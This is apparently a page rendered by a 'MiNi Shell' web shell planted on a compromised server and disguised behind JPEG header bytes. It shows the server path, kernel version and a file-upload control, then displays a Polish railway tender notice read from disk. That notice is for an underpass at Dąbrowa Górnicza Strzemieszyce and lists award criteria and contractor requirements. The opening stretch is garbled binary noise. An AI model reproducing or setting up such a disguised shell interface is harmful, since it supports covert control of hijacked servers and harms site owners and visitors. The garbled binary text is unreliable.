JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211013/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211013/0023099903-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zaprojektowanie oraz budowa przejścia podziemnego dla ruchu pieszo – rowerowego w stacji Dabrowa Górnicza Strzemieszyce w km 69,004 na linii kolejowej nr 62 Tunel – Sosnowiec Główny. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PKP POLSKIE LINIE KOLEJOWE SPÓŁKA AKCYJNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 017319027</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Targowa 74</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">03-734</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">34 370 5262</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">agata.kaleta@plk-sa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.plk-sa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Zamawiający sektorowy ( PKP PLK S.A. ) </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> art. 5 ust.1pkt.4 Świadczenie usług transportu kolejowego </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zaprojektowanie oraz budowa przejścia podziemnego dla ruchu pieszo – rowerowego w stacji Dabrowa Górnicza Strzemieszyce w km 69,004 na linii kolejowej nr 62 Tunel – Sosnowiec Główny. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7d33628d-228f-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00230999</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.plk-sa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W niniejszym Postępowaniu komunikacja prowadzona jest drogą elektroniczną z wykorzystaniem Platformy Zakupowej.<br/>2.	Zamawiający nie dopuszcza komunikacji za pośrednictwem poczty elektronicznej.<br/>3.	Za termin złożenia oświadczeń, wniosków, zawiadomień oraz informacji przekazywanych drogą elektroniczną uważa się termin odnotowania ich dotarcia do adresata na Platformie Zakupowej https://platformazakupowa.plk-sa.pl<br/><br/>Kontynuacja zapisu znajduje się w Tom I -IDW Rozdział 26 WYMAGANIA TECHNICZNE I ORGANIZACYJNE UŻYCIA ŚRODKÓW KOMUNIKACJI ELEKTRONICZNEJ W POSTĘPOWANIU</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	Komputer klasy PC z dostępem do sieci Internet <br/>2)	System operacyjny:<br/>•	Windows (zalecany) wersje aktualnie wspierane przez producenta systemu operacyjnego, rekomendowany Windows 10,<br/>•	Mac OS – wersje aktualnie wspierane przez producenta systemu operacyjnego;<br/>•	Linux – wersje aktualnie wspierane przez producenta systemu operacyjnego. Kontynuacja zapisów znajduje w Tom I - IDW Rozdział 26 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zamawiający działając na mocy art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 2016 r., str. 1-88), zwanego dalej: „RODO”, informuje Pana/Panią , że:<br/>1)	Administratorem Danych Osobowych jest PKP Polskie Linie Kolejowe Spółka Akcyjna, zwana dalej Spółką, z siedzibą pod adresem: 03-734, Warszawa, ul. Targowa 74;<br/>2)	w Spółce funkcjonuje adres e-mail: iod.plk@plk-sa.pl Inspektora Ochrony Danych w PKP Polskie Linie Kolejowe S.A., udostępniony osobom, których dane osobowe są przetwarzane przez Spółkę;<br/>Kontynuacja zapisu Tom I - IDW Rozdział 28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZ10IW. 294.2. 2021.BZ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego Zamówienia jest - Zaprojektowanie oraz budowa przejścia podziemnego dla ruchu pieszo – rowerowego w stacji Dabrowa Górnicza Strzemieszyce w km 69,004 na linii kolejowej nr 62 Tunel – Sosnowiec Główny w ramach projektu pn.: Poprawa bezpieczeństwa i likwidacja zagrożeń eksploatacyjnych na sieci kolejowej zwanego dalej &#34;Inwestycją&#34;. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">22 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Ocena zgodności ofert z wymaganiami Zamawiającego, określonymi w SWZ, przeprowadzona zostanie wyłącznie na podstawie analizy dokumentów i materiałów, jakie Wykonawca zawarł w ofercie.<br/>2.	Ocenie podlegać będzie zarówno formalna jak i merytoryczna zgodność oferty z wymaganiami niniejszej SWZ.<br/>3.	Zamawiający oceni i porówna jedynie te oferty, które nie zostaną odrzucone przez Zamawiającego na podstawie przesłanek wskazanych Ustawą. W ramach kryterium „Okres gwarancji” ocena będzie dokonywana na podstawie deklaracji zawartej w formularzu ofertowym. <br/>1.	Okres gwarancji – oznacza okres liczony od daty odbioru końcowego, w którym Wykonawca w ramach wynagrodzenia za wykonanie przedmiotu zamówienia zapewni Zamawiającemu gwarancję jakości wykonania zamówienia zgodnie z SWZ, w szczególności zgodnie ze wzorem umowy, w tym zapewniając usługi usunięcia zidentyfikowanych wad w zakresie zrealizowanych świadczeń na warunkach określonych w umowie. <br/>2.	Wykonawca winien zadeklarować zaokrągloną do pełnego roku wartość z przedziału od 3 do 5 lat. <br/>Wykonawca, który zadeklaruje 3 lata okresu gwarancji otrzyma 0 pkt., 4 lata – 20 pkt., 5 lat –40 pkt.<br/>3. Zadeklarowanie okresu gwarancji krótszego niż 3 lata skutkuje odrzuceniem oferty, podanie wartości większej od 5, a innej niż wyżej wymienione skutkuje przyjęciem jej do umowy, natomiast do oceny ofert zostanie przyjęta największa z mniejszych od niej dopuszczalnych wartości całkowitych tj. 3 lub 4 lub 5.<br/>Brak określenia okresu gwarancji w Formularzu ofertowym będzie uznany przez Zamawiającego za deklarację minimalnego okresu gwarancji przyjętego przez Zamawiającego tj. 3 lata.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. W zakresie warunku określonego w punkcie 8.6.1 IDW wymagane jest wykazanie przez Wykonawcę, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał:<br/>a) budowę lub przebudowę (w rozumieniu Ustawy Prawo budowlane) co najmniej dwóch kolejowych obiektów inżynieryjnych (wykonanych w ramach odrębnych umów) o wartości co najmniej 10 000 000,00 PLN brutto każda robota. b) budowę lub przebudowę (w rozumieniu Ustawy Prawo budowlane) co najmniej 1 (jednego) przejścia podziemnego dla pieszych pod torami kolejowymi wraz z infrastrukturą towarzyszącą (branża energetyczna, sanitarna o wartości co najmniej 8 000 000,00 PLN brutto. c) co najmniej 1 (jedną) dokumentację projektową dla robót budowlanych polegających na budowie lub przebudowie infrastruktury kolejowej. Dokumentacja projektowa powinna obejmować m.in. branże: kolejowe obiekty inżynieryjne. Na podstawie opracowanej dokumentacji projektowej uzyskano ostateczne decyzje pozwolenia na budowę.<br/>2.	Wymagane jest dysponuje osobami zdolnymi do wykonania Zamówienia, zgodnie z poniższym wyszczególnieniem<br/>1)	Kierownik Budowy – 1 osoba<br/> Uprawnienia (kwalifikacje zawodowe) uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności inżynieryjnej mostowej.<br/>- posiada doświadczenie zawodowe, na stanowisku Kierownika Budowy (w rozumieniu Ustawy Prawo budowlane) w specjalności inżynieryjnej mostowej na robotach związanych z Budową lub Przebudową kolejowych obiektów inżynieryjnych w rozumieniu przepisów w sprawie warunków technicznych, jakim powinny odpowiadać budowle kolejowe i ich usytuowanie, <br/>- posiada doświadczenie zawodowe polegające na pełnieniu funkcji Kierownika Budowy w zakresie budowy lub przebudowy przynajmniej jednego przejścia podziemnego dla pieszych pod torami kolejowymi o długości eksploatacyjnej min. 50m <br/>2)	Kierownik robót torowych - 1 osoba<br/>Uprawnienia (kwalifikacje zawodowe) uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności kolejowej<br/>- posiada doświadczenie zawodowe, na stanowisku Kierownika Budowy lub Kierownika Robót lub Inspektora Nadzoru (w rozumieniu Ustawy Prawo budowlane) na robotach związanych z Budową lub Przebudową nawierzchni torowej<br/>3) Kierownik robót TK - 1 osoba<br/>Uprawnienia (kwalifikacje zawodowe) uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności inżynieryjnej telekomunikacyjnej.<br/>- posiada doświadczenie zawodowe, na stanowisku Kierownika Budowy lub Kierownika Robót lub Inspektora Nadzoru (w rozumieniu Ustawy Prawo budowlane) w specjalności inżynieryjnej telekomunikacyjnej na robotach związanych z Budową lub Przebudową kolejowych urządzeń telekomunikacyjnych.<br/>4) Kierownik robót elektrycznych i elektroenergetycznych - 1 osoba<br/>Uprawnienia (kwalifikacje zawodowe) uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych<br/>- posiada doświadczenie zawodowe, na stanowisku Kierownika Budowy lub Kierownika robót lub Inspektora Nadzoru (w rozumieniu Ustawy Prawo budowlane) w wymaganej specjalności<br/>5) Kierownik robót sanitarnych - 1 osoba<br/>Uprawnienia (kwalifikacje zawodowe) uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych<br/>-- posiada doświadczenie zawodowe, na stanowisku Kierownika Budowy lub Kierownika robót lub Inspektora Nadzoru (w rozumieniu Ustawy Prawo budowlane) w wymaganej specjalności <br/>6) Główny projektant – koordynator – 1 osoba<br/>Uprawnienia (kwalifikacje zawodowe) uprawnienia budowlane do projektowania bez ograniczeń w specjalności inżynieryjnej mostowej<br/>-opracowanie co najmniej 3 (trzech) dokumentacji projektowych dla robót budowlanych polegających na budowie lub przebudowie kolejowych obiektów inżynieryjnych. Na podstawie opracowanej dokumentacji projektowej uzyskano ostateczne decyzje pozwolenia na budowę.<br/>Zamawiający uzna dokumentację projektową, jeżeli będzie obejmować projekt budowlany i wykonawczy dla branży mostowej.<br/>7) Projektant branży torowej – 1 osoba<br/> Uprawnienia (kwalifikacje zawodowe) uprawnienia budowlane do projektowania bez ograniczeń w specjalności inżynieryjnej kolejowej .<br/>opracowanie co najmniej 3 (trzech) dokumentacji projektowych dla robót budowlanych polegających na budowie lub przebudowie nawierzchni torowej. <br/>Zamawiający uzna dokumentację projektową, jeżeli będzie obejmować projekt budowlany i wykonawczy dla branży kolejowej.<br/>8) Projektant urządzeń tk – 1 osoba<br/>Uprawnienia (kwalifikacje zawodowe) uprawnienia budowlane do projektowania bez ograniczeń w specjalności inżynieryjnej telekomunikacyjnej.<br/>opracowanie co najmniej 3 (trzech) dokumentacji projektowych dla robót budowlanych polegających na budowie lub przebudowie urządzeń telekomunikacyjnych.<br/>Zamawiający uzna dokumentację projektową jeżeli będzie obejmować projekt budowlany i wykonawczy dla branży telekomunikacyjnej.<br/>9) Projektant instalacji i urządzeń elektrycznych i elektroenergetycznych – 1 osoba<br/>Uprawnienia (kwalifikacje zawodowe) uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>opracowanie co najmniej 3 (trzech) dokumentacji projektowych dla robót budowlanych polegających na budowie lub przebudowie instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>Zamawiający uzna dokumentację projektową, jeżeli będzie obejmować projekt budowlany i wykonawczy dla branży elektrycznej i elektroenergetycznej.<br/>10) Projektant instalacji i urządzeń sanitarnych – 1 osoba<br/>Uprawnienia (kwalifikacje zawodowe) uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych<br/>opracowanie w charakterze Głównego Projektanta co najmniej 3 (trzech) dokumentacji projektowych dla robót budowlanych polegających na budowie lub przebudowie instalacji i urządzeń sanitarnych. <br/>Zamawiający uzna dokumentację projektową, jeżeli będzie obejmować projekt budowlany i wykonawczy dla branży sanitarnej.<br/>3.	Wykonawca wykaże posiada dostęp do niżej wymienionych narzędzi i urządzeń technicznych w celu realizacji Zamówienia:<br/>a.	co najmniej 1 szt. - koparka o pojemności łyżki co najmniej 1,2 m³,<br/>b.	1 szt. - żuraw samojezdny samochodowy o maksymalnym udźwigu co najmniej 30t,<br/>c.	co najmniej 1 szt. - koparka dwudrogowa z osprzętem: chwytak, łyżka do skrawania skrętna, łyżka podsiębierna o min. pojemności 0,8 m³,<br/><br/>4. Wymagane jest wykazanie przez Wykonawcę, iż znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia tj.<br/>- ubezpieczanie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości minimum 4 000 000,00 PLN (słownie: cztery miliony złotych 00/100 złotych) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1	Zamawiający przed wyborem oferty najkorzystniejszej, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych . <br/><br/>1) Dokumenty i oświadczenia wymagane od Wykonawcy na potwierdzenie spełniania warunków udziału w Postępowaniu:<br/>2)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane ;<br/>3)	dowody określające, czy roboty budowlane wymienione w wykazie zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego roboty budowlane zostały wykonane;<br/>4)	wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania Zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami ;<br/>5)	wykaz osób, skierowanych przez Wykonawcę do realizacji Zamówienia w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania Zamówienia, a także zakresu wykonywanych przez te osoby czynności oraz informacją o podstawie do dysponowania tymi osobami ;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do Formularza złożenia oferty przekazywanego za pośrednictwem Platformy Zakupowej, należy załączyć następujące dokumenty:<br/>a)	„Formularz Ofertowy” – sporządzony zgodnie ze wzorem zawartym w Załączniku nr 1 do IDW;<br/>b)	Oświadczenie o spełnieniu warunków udziału w postępowaniu i braku podstaw do odrzucenia w Załączniku nr 2 do IDW;<br/>c)	Zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia - sporządzone w przypadku, gdy Wykonawca polega na zasobach innego podmiotu zgodnie ze wzorem zawartym w Załączniku nr 3 do IDW lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów<br/>d)	wypełnione „Rozbicie Ceny Ofertowej”;<br/>e)	wykaz osób - sporządzony na podstawie Załącznika nr 6 do IDW;<br/>f)	pełnomocnictwo/a jeżeli jest/są wymagane postanowieniami niniejszej IDW;<br/>g)	oryginał dokumentu wadialnego (gwarancji lub poręczenia, jeśli jest wnoszone w formie innej niż pieniężna); <br/>h)	wykaz narzędzi - sporządzony na podstawie Załącznika nr 7 do IDW;<br/>i)	wykaz robót budowlanych zgodnie ze wzorem zawartym w Załączniku nr 8 do IDW;<br/>i)	odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu:<br/>	Wykonawcy/każdego z Wykonawców występujących wspólnie, <br/>	każdego z podmiotów, na którego zasoby powołuje się Wykonawca w celu spełniania warunków udziału w Postępowaniu, o którym mowa w pkt 9.3. IDW, <br/>	Podwykonawcy, któremu Wykonawca zamierza powierzyć wykonanie części zamówienia, a na którego zasobach 